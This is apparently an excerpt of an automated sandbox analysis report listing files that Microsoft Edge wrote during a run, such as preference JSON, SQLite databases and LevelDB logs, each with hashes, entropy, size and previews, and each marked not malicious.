                                                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6852315298663104
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                                                                                                                                                                                  MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                                                                                                                                                                                  SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                                                                                                                                                                                  SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                                                                                                                                                                                  SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (16663), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.370380897449486
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXCTPhJwp+Npc6XXupUPQwL6:s1cJuHHXzp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:C40E9E26E3839F9312DEA7B8FEB8AA39
                                                                                                                                                                                                                                                                                                                  SHA1:ECCA3EC43F256137845E24ACDB57BD173E3645B0
                                                                                                                                                                                                                                                                                                                  SHA-256:7A83F1CB9EF59C8516D35414502CD16AC7D22F2AB35C84B8966B1F8B0F61D209
                                                                                                                                                                                                                                                                                                                  SHA-512:910BA6A38CE86988AE3DB62E678A2358088A74AE447B9A82BEBD6CE0204F77A8650A6EBD224724BDE0ADCA11F792B96E4C64A8DBF3E9B2436E11B05902750962
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (16663), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.370380897449486
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXCTPhJwp+Npc6XXupUPQwL6:s1cJuHHXzp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:C40E9E26E3839F9312DEA7B8FEB8AA39
                                                                                                                                                                                                                                                                                                                  SHA1:ECCA3EC43F256137845E24ACDB57BD173E3645B0
                                                                                                                                                                                                                                                                                                                  SHA-256:7A83F1CB9EF59C8516D35414502CD16AC7D22F2AB35C84B8966B1F8B0F61D209
                                                                                                                                                                                                                                                                                                                  SHA-512:910BA6A38CE86988AE3DB62E678A2358088A74AE447B9A82BEBD6CE0204F77A8650A6EBD224724BDE0ADCA11F792B96E4C64A8DBF3E9B2436E11B05902750962
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (16663), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.370380897449486
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXCTPhJwp+Npc6XXupUPQwL6:s1cJuHHXzp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:C40E9E26E3839F9312DEA7B8FEB8AA39
                                                                                                                                                                                                                                                                                                                  SHA1:ECCA3EC43F256137845E24ACDB57BD173E3645B0
                                                                                                                                                                                                                                                                                                                  SHA-256:7A83F1CB9EF59C8516D35414502CD16AC7D22F2AB35C84B8966B1F8B0F61D209
                                                                                                                                                                                                                                                                                                                  SHA-512:910BA6A38CE86988AE3DB62E678A2358088A74AE447B9A82BEBD6CE0204F77A8650A6EBD224724BDE0ADCA11F792B96E4C64A8DBF3E9B2436E11B05902750962
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (16663), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.370380897449486
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXCTPhJwp+Npc6XXupUPQwL6:s1cJuHHXzp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:C40E9E26E3839F9312DEA7B8FEB8AA39
                                                                                                                                                                                                                                                                                                                  SHA1:ECCA3EC43F256137845E24ACDB57BD173E3645B0
                                                                                                                                                                                                                                                                                                                  SHA-256:7A83F1CB9EF59C8516D35414502CD16AC7D22F2AB35C84B8966B1F8B0F61D209
                                                                                                                                                                                                                                                                                                                  SHA-512:910BA6A38CE86988AE3DB62E678A2358088A74AE447B9A82BEBD6CE0204F77A8650A6EBD224724BDE0ADCA11F792B96E4C64A8DBF3E9B2436E11B05902750962
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (16663), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16664
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.370380897449486
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXCTPhJwp+Npc6XXupUPQwL6:s1cJuHHXzp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:C40E9E26E3839F9312DEA7B8FEB8AA39
                                                                                                                                                                                                                                                                                                                  SHA1:ECCA3EC43F256137845E24ACDB57BD173E3645B0
                                                                                                                                                                                                                                                                                                                  SHA-256:7A83F1CB9EF59C8516D35414502CD16AC7D22F2AB35C84B8966B1F8B0F61D209
                                                                                                                                                                                                                                                                                                                  SHA-512:910BA6A38CE86988AE3DB62E678A2358088A74AE447B9A82BEBD6CE0204F77A8650A6EBD224724BDE0ADCA11F792B96E4C64A8DBF3E9B2436E11B05902750962
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):37816
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5559603273812055
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Hccl1w7pLGLhFzWPWYf3g8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZKw/drwiZmeDda:Hccl18chFzWPWYf3gu1ja4l/miZm8FDs
                                                                                                                                                                                                                                                                                                                  MD5:4A4482A8F16647EA916FD7E38DD50CAE
                                                                                                                                                                                                                                                                                                                  SHA1:5178FB100D62071AD1B91BD3B3114C0C2C3725D0
                                                                                                                                                                                                                                                                                                                  SHA-256:05C75DB1D862E0205729351EC463F4A4896520D880F775E0A4CCF259BC252C56
                                                                                                                                                                                                                                                                                                                  SHA-512:D703D22FAB8E3DA43995BCF1DE2F37018BB87B43986B2D0FF411C939B58F34DF7F4AEF8578463BB4ACD9CD5DD340E29836BA8B84A7D54563A7FE61F9B4E41D39
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380890356794370","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380890356794370","location":5,"ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):37816
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5559603273812055
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Hccl1w7pLGLhFzWPWYf3g8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZKw/drwiZmeDda:Hccl18chFzWPWYf3gu1ja4l/miZm8FDs
                                                                                                                                                                                                                                                                                                                  MD5:4A4482A8F16647EA916FD7E38DD50CAE
                                                                                                                                                                                                                                                                                                                  SHA1:5178FB100D62071AD1B91BD3B3114C0C2C3725D0
                                                                                                                                                                                                                                                                                                                  SHA-256:05C75DB1D862E0205729351EC463F4A4896520D880F775E0A4CCF259BC252C56
                                                                                                                                                                                                                                                                                                                  SHA-512:D703D22FAB8E3DA43995BCF1DE2F37018BB87B43986B2D0FF411C939B58F34DF7F4AEF8578463BB4ACD9CD5DD340E29836BA8B84A7D54563A7FE61F9B4E41D39
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380890356794370","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380890356794370","location":5,"ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2394
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.812576798080189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:F2xc5Nm1cncmoDCRORpllg2hECfRHGldCRORpllg2h4iV0dFFCRORpllg2hEdRHY:F2emWMrd6CfB2rdey0dlrd6dB0rdjBd
                                                                                                                                                                                                                                                                                                                  MD5:CB501FDB24CB391D5E41CA635B9E2B15
                                                                                                                                                                                                                                                                                                                  SHA1:B4C59AC959D9FC15FDB78DB2B26096F164101A04
                                                                                                                                                                                                                                                                                                                  SHA-256:904DB91353957F382F5F454CE0D7F14BEDF2D8D6C10A970F42C472F9AEC9845B
                                                                                                                                                                                                                                                                                                                  SHA-512:BEFE572B33E10494736FF6146BCB35759A08F8275B02AFCAF097C1B24F6F37C9C1FB7E91B531596887938D91FEB5E999EBEA405020713F325BF9B9733EEB80CA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..C..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):295
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.195806073172368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJKhq1wkn23oH+TcwtE/a252KLl5bJX3+q2Pwkn23oH+TcwtE/a2ZIFUv:7oLfYeb8xL5OvYfYeb8J2FUv
                                                                                                                                                                                                                                                                                                                  MD5:9231DA160444E392AA05288909C923AB
                                                                                                                                                                                                                                                                                                                  SHA1:44BEFB8A76296BF0E07B74804DA0CA2D95F99147
                                                                                                                                                                                                                                                                                                                  SHA-256:49165536E923E6188D77A5368198FE11B2C4AD3E3AFF583FE4D0A4B07E0C6229
                                                                                                                                                                                                                                                                                                                  SHA-512:087D96A69F999797B6153165D93FC4D540B71FE755D701B4A8569BBC855CD585E7D5788AE7373E353DAF622DBCED72C7566CB29ABE35F2E87160CCA2D1B46C15
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:25.798 d38 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/09-04:59:25.822 d38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115808
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.577496880935726
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNt4newXRvhW:B9LyxPXfOxr1lMe1nL/5L/TXJ6LwXRA
                                                                                                                                                                                                                                                                                                                  MD5:8DCED146BEAE8E1590779C04CD9FBEFD
                                                                                                                                                                                                                                                                                                                  SHA1:369357BAEAC8D4ABC6A9AC7C75D6D0D79CB58DCD
                                                                                                                                                                                                                                                                                                                  SHA-256:1D3E290CFB2872A9753A1984038D1F49398BD8F5C853B39AE3557DC695C76FD5
                                                                                                                                                                                                                                                                                                                  SHA-512:0E6C74D9B428F171C3AD8FBB1402D021AE576B99BD4230C737931AFBE97926409B47A72241EB7121BF6A3EB074671964176145EBEFE2CA77C713944955302648
                                                                                                                                                                                                                                                                                                                  Malicious:false
